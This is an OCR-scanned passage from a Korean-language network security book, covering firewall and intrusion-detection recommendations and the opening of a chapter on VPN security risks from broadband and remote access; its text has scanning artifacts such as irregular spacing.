진짜이고 어 느 경 보가 가짜인지 매 번 누가 알아보겠는가. 일부 회 사들은 IDS 들 
이 너무 많은 경보신호를 내보내기때문에 체계를 조절하여 그렇게 많은 경보를 
내보내지 않게 하는 조치를 자주 취하군 한다. 이것은 그들이 망체계에서 무엇 
인가 설정이 잘못되지 않았는지 알아 보지도 않고 탐지표적들의 일부를 꺼버림 
으로써 그 IDS 의 기 능들을 마비 시 킨다는것 을 의 미한다. 

• 문제 4. 변칙탐지 는《 정 상적 인》전송흐름들에 의 거하여 정 상패 턴과 맞지 않은 
모든 비 정 상활동들에 대 하여 경 보신호를 발생한다. 그러 면 어 떤것 이 《 정 상적》 
인 패 런인가. 필자는 언제 인가 망에 IDS 를 배비 한것을 보았는데 각종 필요 없는 
규약들과 봉사도 설정되 여 있고 또 선을 통하여 평문인증이 통신되 는것 을 본적 
이 있었다. 《 정상》틀이 라는것은 거의 모든것을 다 통과시키 고 결과 IDS 의 변 
칙 람지능력을 크나작으나간에 마비시키는 틀이 되 였 다(요즘 사람들이 흔히 자기 
집 콤퓨터 에 장치 하는《 개 인용방화벽》도 이 렇 다.). 

IDS 가 방화벽 에 아주 효과적 인 보충수단으로 되 는것 은 방화벽 이 각이한 IP / TCP/UDP 
머 리 부분정 보와 원천지/목적 지，날자/시 간과 같은 정 보를 기 록하기만 하는데 비 하여 
IDS 가 공격내 용기 록을 더 잘하기때 문일 것 이 다. IDS 를 리용하면 방화벽 과 그 기 록만 
가지 고 있 는데 비 하여 해 커활동을 더 오랜 기 간에 걸 쳐 통계 를 내 는것 도 더 쉽다. 이 
러한 통계들이 있으면 회사의 체계들에 대한 해커공격이나 비법적인 접근이 있는 경 
우 경영진에 실태를 보여 주기 쉬울뿐아니라 그 사용자들속에서 전반적보안의식을 높 
이 는데도 좋다. 

한편 IDS 는 방화벽보다 사람의 방조가 더 많이 필요하기때문에 회사는 이러한 체계 
에 대 한 목적 을 명백 히 정 한 다음에 구매 하고 배 비 해 야 한다. 해커들이 망에 들어 오지 
못하게 하겠다는 순진한 목적만 가지고서는 안된다. 

총체적권고와 결론 

방화벽은 자료를 주고받는 체계와 망들뿐아니라 자기자체도 보호할수 있도륵 설정되 
여야 한다. 사실상 방화벽은 인터네트도《보호할수 있게》되여야 한다. 즉 내부〈〈해 
커》들이 인터네트에 련결된 다른 사람들을 공격하지 못하게 해야 한다는것을 의미한다. 
경 로기，교환기，봉사기들과 같은 망주변장치 들도 체 계자체 뿐아니 라 방화벽 환경 을 보호할 
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수 있게 설정되여야 한다. 

보안전문가들은 인 터 네 트접 속을 허 용하기 전에 반드시 사용자인증을 사용하게 하여 야 
한다. 많은 경우 이 렇게 되 면 HTTP , FTP , Telnet 등과 갈은 규약을 리용하여 인터네 트상 
에서 비루스들과 트로이목마들이 호스트와 접촉하지 못하게 할수 있다. 

필 요 없 는 말 같지 만 회 사의 망에 서 인 터네 트를 개 인 용도에 사용하는것 은 일 반적으 
로 금지시켜야 한다. 물론 통제준위설정도 고려될수 있지만 본질상 사용자들이 POP 3, 
SMTP , FTP , HTTP 와 같은 규약들과 ASCII 나 2진수형식으로 파일을 보낼수 있는 기타 규 
약들을 리용하여 내부망에서 파일들을 내보내거나 위험한 내용(비루스，트로이목마)을 내 
리 적 재 하지 못하게 하자는것 이 다. 

마지막으로 회사보안방책에서 요구하는 보안수준에 부합되게 하자면 다른 도구들 
도 배치해야 한다. 필자의 경험에 의하면 설치된 모든 방화벽들의 50%이하가 전반기록 
을 수행 하고 있으며 그 방화벽소유자들중 5%미 만이 쓸만한 기 록분석 , 보고， 통제비 슷 
한것 을 실지 로 하고 있다. 일부 사람들에 게 는 우의 모든것 이 《 우리 에 겐 방화벽 이 있 
으니까 안전하지뭐》하는 태도처럼 보일것이다. 이런 태도는 어리석은것일뿐아니라 틀 
린것이다. 

해커들이 구석구석 에 숨어 있는 우리의 현 인터네 트통신의 시 대 에는 최소한 방화벽 
들과 방화벽기 술 그자체 만으로는 믿 을수가 없 다. 허 용된 규약들과 포구들을 통하여 자료 
를 찾아《 굴을 뚫는》해커들은 오늘날의 방화벽을 쉽게 우회할수 있으며 암호화기 법을 
리용하여 그 흔적을 숨길수도 있다. 그러나 보안관리자들은 일관적이며 전반적인 보안구 
조의 부분으로서 의 방화벽 이 아직 도 회 사의 망보안에 서 중요한 부분이 라는것 을 인식하여 
야 할것이다. 
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제 1 2장. 가상개별망의 보안 


제임스 에쓰 털러 


가상개 별 망 ( VPN ) 이 수많은 각이한 기 업분야에 서 광범히 파급되 고 있는것 은 놀라운 
일 이 아니 다. 수직적시 장이 나 무역 에 관계 없 이 VPN 은 유연성 이 있으며 잘 실행되 고 사 
용되 면 투자의 효과성 을 즉시 에 볼수 있는것 으로서 통신에서 결정 적역 할을 할수 있다. 
VPN 은 지금까지 그 도입범위 가 상당히 넓었으며 그 도입속도도 빠르다. 기 술이 발전함 
에 따라 이 경향은 계속 증가할것이다. VPN 이 이러한 파급력을 보이게 된것은 그 기술 
의 실현이 상대적으로 쉬운것으로 알려 진데 있다. 보건대 단순하며 눅고 무제한하게 리 
용할수 있 다는 전망으로 하여 이 새 로 발견된 통신형 태 를 미 친듯이 리용하기 시 작하였 다. 
그런데 VPN 의 좋은 주요특징들만 보고 사람들은 미사려구가 들어 찬 판매광고와 제품소 
개에 그만 놀라서 그뒤에 숨은 모호한 보안상 기본약점은 보지 못하였다. 이 장에서는 
VPN 과 관련된 보안위 험 률과 VPN 을 곧 보안이라고 보는 잘못된 인식 에 대 하여 집 중적으 
로 보려고 한다. 

여 기 에서 구체적 으로 설명되는 보안상 제 한성들은 VPN 기 술자체와는 거의 무관계하 
다는것 을 반드시 리해하여 야 한다. VPN 기 술에 는 여 러 가지 가 있는데 몇 가지 실례 로 
IPSec , SSL , PPTP 를 들수 있다. 요구사항과 실행의 견지에서 보아도 매개가 장점과 단점 
을 다 가지고 있다. 또 매개 기술이 다 보안수준이 다르므로 여러가지 조건들에 다 결합 
하여 쓸수도 있다. 이 장에서는 매체 및 과정으로서의 VPN 의 불안전성에 대해서만 보고 
기 술적측면이 나 기 술적표준에 대 해서 는 보지 않기 로 한다. 

다루려는 문제는 VPN 에 대한 평가인데 흔히 소비자들은 시장에 쓸어 드는 자질구레 
한 제품이나 소비자의 요구를 충족시킨다는 업계의 제품들을 보고 VPN 에 대한 평가를 
내 리 군 한다. 그런데 소비 자의 수요는 끊임 없 이 높아 가는데 보안제 고를 위한 충분한 기 
술의 개발은 실지 경험이 부족한것으로 하여 령상태나 다름 없다. VPN 에 대하여 이야기 
할 때면 흔히 《보안》이라는 단어가 많이 쓰이군 하는데 이것은 VPN 자체 즉 통신되고 
있는 자료에 대 한 보호를 의 미할것 이 다. 그럼 에 도 불구하고 보안이 제 일 필요한 점 인 
VPN 이 끝나는 점에서 이 통신의 보안이 끝나고 마는것이다. 

이 장의 목적 은 VPN 을 소개하며 그것 이 최 근에 인기 가 대단한데 대 하여 그리 고 
전 역망과 갈은 인터네 트분야에서의 새 로운 발전의 련관관계 에 대 하여 설명하는것 이 
다. 또한 기성 원격접근대 안들에서 경험한 보안과 최 근에 업 계 에서 도입된 보안실천 
과의 대 비를 보기 로 한다. 이것은 희미하던 문제를 명백 히 고찰하고 이 기술이 기관 
의 전반적보안태세에 어떤 큰 영향을 주는가를 토론하게 되는 중요한 기회로 될것이 
다. 문제 는 사실 너 무 방대하여 리해 하기 힘 들다. 《 나무는 보지 만 숲은 못 보는 격》 
이 라고 할수 있다. 
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하나의 문제가 다른 문제로 


VPN 의 인기는 하루밤사이에 폭발적으로 올라 간것 같다. 회사의 매 원격근무자들을 
위한 전용선을 관리하는 힘 든 일 을 다 그만두고 현재 있는 인 터네 트선을 리용하여 지난 
시기에는 불가능하였던 수많은 결선을 다중화할수 있음으로 하여 VPN 기술은 말그대로 
폭발적으로 발전하게 되였다. 

기술들을 잘 결합하면 흔히 그러하듯이 한 형태의 기술이 다른 형태의 기술에서 좋 
은 점을 섭취하고 그 성과에서 리익을 얻는것은 보통현상이다. 이것이 실현되여 기술적 
인 향상이 나 선택 으로，그것들이 결합되 여 또 실현되 면 한 형 태의 기술만으로는 달성할 
수 없는것이상을 달성하는 일석이조의 효과를 거둘수 있다. 이동전화는 이러한 현상의 
대 표적실례 이 다. 이동전화에서 는 전자인증서，암호화기 술，전자우편，열 람을 비 롯한 여 러 
기 술들과 혁 신적 성 과들을 지 원한다. 무선계 에서 는 흔히 망기 술에서만 볼수 있던 기 술블 
을 리용하여 왔는데 이 기 술들은 현재 다른 환경 에 서 사용되 고 있는것 으로 하여 큰 주목 
을 받고 있다. 이동전화사용은 보다 확고하며 여기에 사용된 기술은 이전에 상상도 못하 
였던 방식으로 사용되였다. 이것을 흔히 이른바《이기고 또 이기는》 ( “ win - win ” ) 정황 
이 라고 한다. 

최 근에 VPN 을 보편적 으로 도입 하고 있는것은 통신산업에서의 두가지 기 본변화 즉 
전 세 계적 인 인터네트의 도입과 값 눅은 전역망에 의한 인터네트접근에 기 인된다고 볼수 
있다. 최근에 일어 난 이러한 변화들과 끊임없이 늘어 나는 이동성사용자들을 지원해야 
할 필요성으로 하여 VPN 기술은 인기의 절정에 올라 섰다. 

이동성사용자 


이동 ( roaming ) 에 대 해서는 지 난 시 기 고정된 성 원에 한하여 봉사를 제공하고 망의 정 
상적 인 변두리밖에 대 하여 득 같은 고정된 봉사만 제 공하던 이 전시 기 의 망으로부터의 자 
연적인 발전 이 라고 특징 지 을수 있 다. 아마 하루밤사이 에 원격접 근이 사용자들에 게 가장 
중요한것 으로 되 여 원격접 근보장에 막대한 자원 이 투하된듯 하다. 

그림 12 — 1에서 보는바와 같이 초기에는 모뎀들을 모아 내부망접근을 허용하는 공통 
적인 장치에 련결하였으며 모뎀들과 전화선들이 련결되였다. 사용자들의 사용상 요구가 
기 하급수적 으로 늘어 남에 따라 모뎀 의 전송속도도 점 차 올라가 변화가 림박해 졌 다. 변 
화의 첫 물결은 바로 원격탁상형콤퓨터의 형태로，일부 경우에는 전반적체계상에서 나타 
났다. 그림 12 — 2에서 구체적으로 보여 주는바와 같이 원격조종되거나 혹은 원격사용자 
에게 탁상형콤퓨터환경을 보내는 체계에 사용자는 전화번호판을 돌려 접속할수 있다. 두 
경우에 다 원격사용자와 핵심체계사이에 필요되는 대역너비는 실지 작아 졌고 기능은 증 
폭되 였 다. Cubix , Ci 仕 ix 와 PC Anywhere 회 사들은 요구사항，우점，가격 이 서 로 다르지 만 
이러한 기술을 향상시키는 작용을 놀았다. 
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내부망에 있는 원격접근봉사기가 다른 망자원에 매우 높은 속도로 접속하는것을 보 
고 성능을 판정하였다. 접근봉사기를 조종하거나 탁상형콤퓨터를 사용하는것과 갈은 감 
각을 얻기 위하여 경 량규약을 사용하니 모뎀을 통한 접속이 마치도 실지 망에서와 갈은 
느낌을 주었다. 원격접근이 진행되여 나가다가 내부망에서와 꼭 갈은 감각을 느끼게 되 
면 바로 이 지점을 원격접근대안을 계측하는 기준점으로 삼았다. 이 지점에서 더 앞으로 
나가면 차이가 너무 심하거나 불편한 점이 더 많이 생겨 아마 원격접근대안을 다 검어 
치우고 말것이다. 


인테 II 트리용 


인터네트는 말그대로 현저한 속도로 장성하여 왔다. 통신망에 발을 처음으로 들여 
놓은 사람들의 수로부터 통신기술에서의 도약에 이르기까지 인터네트는 점점 더 많은 
사람들이 리용하게 되여 그 밀도와 인구수는 나날이 높아 지고 있다. 인터네트는 특 
별한 인기라든가 단순한 흥미거리라기보다 이제는 기업과 개인통신의 필수적인 요구 
로 되였다. 인터네트와 련관이 없던 기업들이 지금에 와서는 이것을 발판으로 원가는 
줄이면서 고객들을 더 많이 늘이고 고객들을 더잘 만족시키려고 노력하고 있다. 새 
사무실이 나 이미 있던 사무실이나 인터네트망을 표준설치하는것은 이제 와서 그리 드 
문 현상이 아니다. 

반대로 전용인터네트련결선을 초기에 도입한 사람들은 대체로 회사전체에 하나의 
접 속점 만 두었 다. 그림 12 — 3에 서 보는바와 같이 원격사무실 들은 광지역망 ( WAN ) 을 
지 나서 중앙조종점 에 이 르러 서 야 인 터네 트에 접 근할수 있 게 된 다. 인 터네 트의 규모와 
회선수가 제한되였을 때에는 이러한 설계씨나리오가 그럴듯하였다. 인터네트접근에 대 
한 요구가 높아짐에 따라 인터네트가입자수는 정비례적으로 늘어 나 WAN 에 과잉부 
하가 걸리기 시작하였다. 그로부터 얼마후 직접결선비용이 떨어 지자 인터네트는 점 
차 기업생활의 일부로 되여 필수적인 도구로 되였으며 그에 대한 요구는 더욱 높아 
졌 다. 

인차 인터네 트는 성 공하는 기 업들에 있어서 필수적 인 요소로 되 였으며 현재 내부 
망들을 오가는 인 터네 트전송량은 놀랄 정 도로 방대하다. 정 보에 대 한 요구는 현재 인 
터네 트리용비 보다 훨씬 더 중요하다. 과거 에 는 인터네 트접속을 심 중히 검 토하고야 실 
행시키군 하였다. 오늘에 와서는《 얼마나 굵은 케 블이 필요한가》하는 질문이 나오지 
《어데에 설치하려 하는가》라는 질문은 나오지 않는다. 인터네트가 광범하게 도입되 
고 또 그것 을 절 실한것 으로 받아 들임 으로 하여 인 터네 트의 밀 도와 다양성 은 크게 높 
아 졌 다. 오늘 많은 기 관들에 서 는 접 근점 을 여 러 곳에 가지 고 그것 들을 리용하여 내 부 
망의 부하를 덜며 내부사용자들에게 더 높은 성능을 제공해 줄뿐아니 라 봉사에서 여유 
도 조성 하고 있다. 현재 있는 수많은 인터네 트결선을 리용함으로써 VPN 기 술을 실현하 
여 통신을 보다 개 선하면서 도 VPN 을 도입 하기 오래전부터 수지 가 맞는 봉사를 진행할 
수 있다. 
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그림 12-3. 하나의 중심점을 통한 인터네트접근과 
여 러개의 중심 점 을 통한 인터 네 트접 근과의 비 교 


광 대 역 

오늘 표준으로 된 인 터네 트에 대 한 고속접 속이 존재 하기전에 는 모뎀 과 전화선만이 
있 어 고통스럽 게 접 속을 해 야 하였 다. 물론 그때 에 도 몇명 안되 는 특권적 인 사용자들이 
있 어 ISDN 을 가지 고 일정하게 안도감은 느끼 고 있 었 다. 그러 나 접 속은 여 전히 모뎀 에 
의한것이여서 일을 제대로 하기란 참으로 끔찍스러웠다. 원격접근의 초기도입자들은 모 
뎀을 가지고 자료전송과 봉사를 할수 있었다. 인터네트가 널리 퍼짐 에 따라 모뎀을 인터 
네 트접 속수단을 제 공하는 인 터네 트봉사제 공자 ( ISP ) 에 련결 하였 다. 두 경 우에 다 제 한된 
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속도로 해서 고통은 변함이 없었다. 

오늘 매 개인이 집에 앉아서 인터네트에 접속하게 되는 그 속도는 이전에 최대규모 
의 회사들이나 쓸수 있었던 비용이 많이 드는 선으로 이룩하였던 그 력사적인 속도라고 
할수 있다. 지금은 간단한 도구를 설치하여 ISP 에 접속하며 이씨네트를 리용하여 집이나 
자그마한 사무실에 있는 호스트콤퓨터와 접속할수 있다. 오늘 접근제공과 조종은 개인를 
퓨터에서 각각 따로 진행하며 사용자가 개입할 필요가 거의 없다. 오늘 접근제공과 접근 
조종은 사용자콤퓨터에서 별도로 진행되며 사용자의 개입을 거의 요구하지 않는다. 사용 
자는 물리적련결과 통신매체의 작용에 대해서는 거의 감각하지 못한다. 사용자가 콤퓨터 
를 켜면 인터네트는 순간적으로 접속되여 쓸수 있게 되여 있다. 이것은 사용자콤퓨터와 
모뎀이 서로 협력하여 신호종단점으로 되며 련결제공과 관련한 모든 책임을 떠맡는 물리 
적 련결과는 상당한 대조를 이룬다. 

많은 통신기술들과 마찬가지로(특히 모뎀형원격접근과 관련한) 종단점이 주어 져야 
원격접근이나 모뎀을 련결할수 있다. 전화회선을 사용하는 경우 모뎀(가상모뎀이든 물리 
적모뎀이든)이 있어야 원격체계가 전화선으로 련결되여 통신을 할수 있게 된다. 광대역 
인 경우 그것이 케블모뎀기술이든 xDSL 기술이든 류사한 요구가 제기된다. 즉 종단점이 
주어 져야 집이나 사무실에서 원격기구가 접속을 실현할수 있게 된다. 

VPN 도입 과 관련하여 핵심 적문제 인 종단점은 광대역과 모뎀 을 가르는 주요 판별요인 
들중의 하나로 되 였다. 종업 원들에 게 전화선에 의한 원격접 근을 제공하기 위 해서는 봉사 
기 즉 워크스테이션에 한대의 모뎀만 설치하고 전화선을 련결할수 있었다. 원격사용자에 
게 모뎀 한대，전화번호 그리고 기초프로그람만 주어 지면 련결이 되여 체계와 봉사들에 
충분한 접속이 이루어 지게 되였다. 

반대 로 광대역실현에 서는 문제 가 보다 복잡하고 비 용은 상당히 더 들기때 문에 오 
늘 봉사제 공자들만이 이 기 술을 실 현 하고 있 다. 그 하나의 례 가 바로 인 터네 트케 블봉 
사이 다. 케 블기 반에 의 거하여 자기 자체 의 내 부원 격접 근을 실 현 하는 회 사들은 많지 못 
하다. 현재 점 대 점원격접근해결책으로는 광대역이 리용되지 않고 있다. 바로 여기에 
VPN 의 근본적 인 매 력 즉 이 선진통신기 술을 리용하여 회 사자원들에 접 근할수 있는 
방도가 있다. 

속도가 상당히 증가하는것 이 사람들에게 큰 호기심을 자아내는것은 바로 모뎀 이 제 
공하는 제한된 대역너비가 사람들의 요구에 비해 보면 너무나도 좋기때문이다. 또한 콤 
퓨터 에서 그 모뎀 기술을 분리시키면 통합이 간단해 지며 규모조절도 가능해 진다. 이 런 
조건에서 광대역은 회 사자원리용에서 극히 매 력적 이 다. 광대역 을 가지 고 고속인터네트열 
탐과 개별유람을 한다는것과 광대역기능을 가지고 기업의 목적을 위해 일한다는것은 별 
개의 문제이다. 그러나 우에서 언급한바와 같이 광대역기술들은 비봉사제공자기관이 내 
부용으로 실 행 하기에 는 복잡하며 불가능하다. 현재 인 터네 트접 속만 보장하는 고속통신대 
안은 아마 VPN 의 출현전까지 는 나와야 할것 이 다. 
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확장 접근 


통신능력들이 커지고 회사들이 인터네트를 일상생활에 구현하기 위한 사업을 계속 
추진시컸으므로 통신능력과 인터네트를 결합시킬수 있는 VPN 기술을 창조하는것이 필수 
적이 였다. 전화회선식 인터네 트접속과 광대역 을 쓰면 어 디 에서 나 고속으로 인터네 트에 접 
속할수 있 다. 두가지 다 인 터네 트에 전 반적 인 접 속은 제 공하지 만 회 사본부에 로의 접 속을 
종단시 켜 주는 가능하고도 효과적 인 방도는 없 다. 광대역 접 속은 인 터네 트에 가깝게 련 관 
되 고 직 접 전화식 대안들은 비효과적 이 며 비 용이 많이 드는것 이 므로 유일 한 방도는 인 터네 
트를 씨서 전용통신을 보장하는것이 였다. 이 렇게 되 여 결국 기관들에서는 자기들이 현재 
가지 고 있는 인 터네 트망에 원격련결 을 다중화하게 되 였 다. 마지 막난관은 비 밀성，정 보무 
결성，접근조종，인증，검사，부인방지 등의 형태로 통신의 보안을 보장하는것이였다. 

전 세 계 적 인 인 터 네 트도입 은 그 사용성 과 속도의 증가에 의 하여 전화회 선 에 의 한 무 
제한한 접근을 훨씬 릉가하게 되였다. 직렬통신자체는 전용회선으로 진행되여 해커가 침 
습함수 없 었 으며 따라서 상대 적 으로 안정하였 다. 전화회 선에 의한 망접 근으로 하여 전화 
체계 가 통신수립 에 적극 활용되게 되 였으며 어 디 가나 전화를 통하여 인터네트를 쓸수 
있게 되 였 다. 인터네 트접 속에 모뎀 을 사용한다고 하면 속도는 보장되 지 못하며 전화체 계 
는 련결 하느라고 계 속 사용되 지 만 국부에 서 벗 어 나지 못하게 된 다. 인 터네 트는 여 전히 
공통적인 련결매체로 리용되고 있다. 전화회선에 의한 원격접근만도 봉사에서 커다란 비 
약으로 된다. 그것은 회 사들이 제 공한 원격접근방식 은 해외 에서 접속하기 곤난한것들이 
기때문이다. 방책상 제한은 없었지만 전화설비와 전화계통이 오늘처럼 질이 높지 못했고 
또 장거 리전송으로 하여 통화가 잘 안되였기때 문에 비 용이 문제 점 으로 되 였었다. 이와 
반대로 세계적으로 전화번호를 보장하는 매우 큰 ISP 들을 내놓고도 인터네트접속을 보장 
해 주는 ISP 들은 수만을 헤 아리고 있다. 그러다나니 접근점을 끝없이 제공해 주는것을 
제 외 하고도 세계 적 인 수백개의 ISP 들을 위한 료금처 리와 관리를 해 주는 본사로 활동하는 
회사들도 있다. 사용자의 견지 에서 보면 지구상에는 하나의 큰 ISP 만 있는것 이 다. 

최종적 인 난관은 지 난 시기 전화망으로 원격접근을 할 때 생기던것과 같은 전송과정 
의 영 향이 나 로출 등 사고로부터 통신을 보호하는것이 였 다. VPN 기 술이 바로 이 빈 공간 
을 메 꾸어 주었 다. 통신능력 이 확장되 고 인 터네 트의 리용률 이 높아감에 따라 전송과정 에 
회사의 생명과 같은 자료들이 쉽게 보호될수 있었다. 

언제나 련결된 상태에서 


지난 시 기 원격 사용자는 본부에 있는 모뎀 은행 에 전화선을 리용하여 접 속하여 원격 
으로 봉사와 접 속하면 도청，전송장애 혹은 위 장과 갈은데 는 거 의 우려하지 않았다. 호스 
트싸이트의 견지 에서 로출을 방지 하기 위 해서는 보안계 층이 실현되 여 야 하였 다. 인증，역 
호출，시 간제 한，접근제 한들을 리 용하여 통신에 대 한 통제를 강화하고 위 험의 가능성을 
약화시켰 다. 이리 한 보호조치들이 가능하게 된것은 주로 통신의 1대 1 성격이 있기 때문이 
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였다. 통신이 수립되면 쉽게 찾아서 통제할수 있었다. 통신자체는 전용선으로 공공전화체 
계를 통과하는 동안에는 상대적으로 보호되였다. 



그림 12-4. 광대역에 의하여 불필요하게 된 사용자 및 체계의 접속수립 


이써네트에서 접근장치에 대한 접속에 광대역기술이 리용되기때문에 를퓨터를 켜놓 
기만 하면 인터네트통신을 할수 있게 된다(그림 12-4). 이것은 콤퓨터가 접속수립과 유 
지 를 책 임지 고 해 야 하였던 전통적 인 모뎀식접근으로부터의 커 다란 전환으로 된다. 현재 
표준광대역 으로 접 근장치 에 접 속되 면 이써네 트대 면부에 있는 다른 체 계 들의 상태 에 는 관 
계없이 인터네 트로 나갈수 있다. 콤퓨터의 이씨네 트대면부는 사용자가 대 면부를 초기 화 
하거 나 전화번호를 알거 나 접 속에 대 하여 조심할것 을 요구하지 않는다. 이 모든것 은 조 
작체 계 에 의하여 조종되 며 지 어 IP 주소는 ISP 가 자동적 으로 할당해 주어 사용자와의 호 
상관계를 더 필요없게 한다. 인터네트접속은 전적으로 그 책임이 접근장치에 달려 있어 
사용자를 해 방시키 며 사용자의 를퓨터 를 접 속유지 의 부담에 서 해 방시 켜 준다. 그 끝점체 
계 는 단순한 망의 한마디점 이 다. 

접근장치에 련결된 콤퓨터들은 거의 보호없이 인터네트에 련결되게 된다. 광대역제공 
자가 콤퓨터 에 케블과 이씨네 트대 면부를 설 치 하고 보안조작이 없 이 콤퓨터를 련결시 키 는 
것은 매우 례 사로운 일 이 다. 이 것 으로 하여 말단체 계 에 그 어떤 보안통제 가 없 이 인터네 
트에 직접 오랜시간에 걸쳐 련결되여 있게 된다. 차이는 크다. 인터네트상에서 이동형사 
용자가 잠간동안 접속했지만 ISP 를 전화선상으로 찾는것， IP 주소，전송형 태 지 어는 그 콤 
퓨터위치까지 인터네트에는 오래동안 남아 있게 된다. 회사의 직접적인 원격전화선상지원 
과 비 교해 보면 그 로출은 깜짝 놀랄만한것 이 다. 명백한 차이는 사용자가 인터네트에 련 
결되여 있는 상태에 비하여 회사가 제공하는 전화회선식련결은 점 대 점 이 라는것 이 다. 
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어느 한 체계가 인터네트에 련결되여 있을 때 그 형태에는 관계없이 그 체계는 무수 
한 위협을 받을 처지에 놓이게 된다는것은 널리 알려 진 사실이다. 또한 인터네트에 접 
속되여 있는 지속시간이 길면 길수록 해커들에게 발견되여 목표로 될수 있는 가능성은 
더욱 커 진다. 전용인터 네트선로에는 대체 로 방화벽 이 배 치되지만 인터 네트에 드문드문 
접속하는 호스트측에서는 그것이 잘 보이지 않는다. 그 리유의 하나는 접속의 성격 즉 
움직이는 목표를 타격하는것은 훨씬 더 힘들다는데 있다. 그러나 현실은 이것이 틀리며 
이중성체계들도 전용선을 가진 체계들과 꼭같이 간섭 당할수 있다는것이다. 간단히 말하 
여 전화회선식인터네트접속은 체계를 위험에 빠뜨리며 전용선도 꼭 갈은 위험성이 있으 
며 오히려 시간적으로 볼 때 위험성은 더 높다는것이다. 언제나 접속되여 있든 잠간 접 
속되여 있든 광대역이든 모뎀이든 인터네트에 들어 가면 공격위험은 반드시 있다. 일이 
바로 그렇게 일어 나는데 만약 늘 련결되여 있다면 그 사용자는《날아 다니는 오리》가 
못되 고《 앉아 뭉개 는 오리》로밖에 안될것 이 다. 

회사망에로의 접근 


VPN 기 술은 원격 사용자들이 인 터네 트를 리용하여 회 사자원에 접 근하게 하는 최 종적 
인 촉매제이다. 이것은 응당한 전진과정으로 되였다. 인터네트는 어디에나 있으니까. 전 
화체계와 마찬가지로 더 높은 대역너비접속들이 정상으로 되고 있으며 VPN 기술은 암호 
화기법 들과 인증으로 통신을 안전하게 해 주고 있 다. 

VPN 이 성 공하게 된 요인은 지 금까지 광대역 기 술의 도래 와 리용에 있 다. 그것 은 고 
속접 속이 가능하여 열 람하기 에 좋았으며 더 큰것 들도 인터네 트에 서 더 빨리 얻 어 낼수 
있게 하였기때문이 였다. 그런데 그것 이 거의 전부였다. 32 K 또는 56 K 모뎀 등을 통한 인 
터네트개 인접속과 주로 관련되여 있던 대역너 비가 거의 하루밤사이 에 100배로 뛰 여 올랐 
다. 공공전화체계와 모뎀에서 벗어 나 전용광대역선로를 가짐으로써 더 큰 접속속도를 
엄게 되자 즉시 격정의 파도가 일기 시작하였다. 그러나 거의 동시에 많은 사람들이 그 
봉사를 기 업 자원 에 접 근하는데 리용하려 고 하였 다. 접 근속도가 크게 도약한데 대 한 흥분 
이 점 차 가라앉음에 따라 많은 사람들은 이것을 원격접근에 쓸수 있는 방도를 람구하는 
데 눈을 돌리기 시작하였다. 바로 이 시점에서 VPN 기술이 도약하였으며 기술계를 빨아 
들였던것이다. 

원격의뢰기쏘프트웨어는 처음 나타났다. 어느 한 제품일식에는 기업의 싸이트에서 
인터네트와 련결된 장치와 이동식체계에 적재된 의뢰기쏘프트웨어가 있어 인터네트로 회 
사의 자원에 원격접 근할수 있게 되 여 있 었 다. 원격접 근대 안을 해 결 하기 위하여 막대한 
시 간과 자금이 투하되 였으며 지 금도 계속되 고 있 다. 원격 의뢰기접 근과 보조를 맞추어 
VPN 에 뛰여 든것은 VPN 을 종단시켜 다시한번 의뢰기 체계 가 통신의 부담을 벗 어 버리게 
하는 DSL 과 케 블모뎀대 체안이 였 다. VPN 은 지 금 광대역 접 근이 라는 세 찬 돌개 바람으로 
전반적 인 기 술계 를 휘 몰아치 는 불길 이다. 

회사망에 무제한하게 접근이 허용됨으로 하여 원격싸이트나 원격사용자들이 회사싸 
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이트에 설치된 정교한 방화벽과 기타 보호수단에 의하여 보호되던 자료들을 마구 복사하 
거나 열어 보게 되는것은 범상한 일로 되게 되였다. 많은 경우 VPN 을 리용하면 원격사 
무원들에게 보장해 주는 비싼 자원과 방조없이 원격체계에서는 불가능한 응용프로그람들 
을 실행시킬수 있다. 간단히 말하면 VPN 은 내부망에 있는 체계에서 흔히 할수 있는 모 
든것을 다 할수 있게 한다는것이다. 일부 대안들에 는 Microsoft 회사의 Windows Internet 
Naming Service ( WINS ) 와 NetBIOS 능력들을 제품에 포함시킴으로써 자원과 체계에 대한 
령역열람을 마치도 회사싸이트에 앉아 하는것처럼 할수 있게 한다. 

본질 상 VPN 은 원격활동을 내 부조작으로 미 끈하게 융합시 키 는 일 종의 《 만병 통치 
약》으로 실현되고 있는 중이 다. 최종제품은 통제환경의 테두리를 멀리 벗어 난 먼곳에 
있는 체계에서 쓸수 있는 자료와 응용프로그람인것이다. 

끝은 열려 있어 


근본적으로 VPN 이 제공하는 봉사는 매우 단순하다. 즉 전송중의 정보를 보호하는것 
뿐이다. 그렇게 함으로써 여러가지 정보통신의 혜택이 이루어 질수 있을것이다. 하나의 
좋은 실례 가 런넬화 ( tunneling ) 이 다. 통신의 보안을 결함없이 깨끗하게 하기 위 하여 원래 
의 자료흐름을 교갑화한 다음에 전송한다. 교갑화공정은 보호공정과 자료전송과정을 간 
단하게 해준다. 우점은 여기에서 VPN 에 속한 체계들이 마치도 거기에 중개자가 없는듯 
이 통신을 진행하는것 이 다. 그림 12 — 5에 제시된 실례는 내부망에서 흔히 작용하군 하는 
데타그램을 만들어 내는 원격체계이다. 이 데타그램은 교갑화되여 인터네트상으로 회사 
사무실에 있는 체계로 전송되면 거기 에서 원래 데타그램을 교갑해제하여(필요하면 복호 
화하여) 내부망으로 배포한다. 응용프로그람들과 말단체계들은 그이상 더 령리한 작업을 
할수 없다. 



그림 12-5. 회사자료에 대한 공격자의 직접접근시：寒; 
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일부 VPN 실행계획들의 목표는 인트라네트봉사를 최대한 모방할수 있는 통신을 인터 
네트상에서 원격사용자들에게 제공하는것 이 다. 많은 VPN 대 안들이 비판을 받았는바 그것 
은 내부망에서나 가능한 봉사를 의뢰기체계들에 해줄수 있는 능력때 문이 였 다. 광대역 인 
터네트접근의 도입으로 하여 대역너 비가 좁아 제한성 이 있던 전화회선식대안에서 생기 던 
순수 사용적 인 측면에서의 난관이 일정하게 해 소되 였 다. 통신상 요구가 늘어 나는데 대 
응하기 위하여 많은 VPN 대 안들이 서 로 결합되 여 사용자뿐아니 라 그 선로를 쓰는 응용프 
로그람에도 사용됨으로써 그 작용이 비교적 원활하게 되여 가고 있다. 따라서 VPN 에 의 
하여 실현되는 보호는 실지 자료전송에만 해당되는것이다. 이것이 그 목적이기도 하다. 

대부분의 경우 교갑화나 암호화전에 어떤 공정이 있는데 VPN 은 다만 전송을 보호하 
기 만 한다. 접 속상태 는 보호되 지만 그렇 다고 하여 통신 이 보호되 는것 과는 같지 않다. 더 
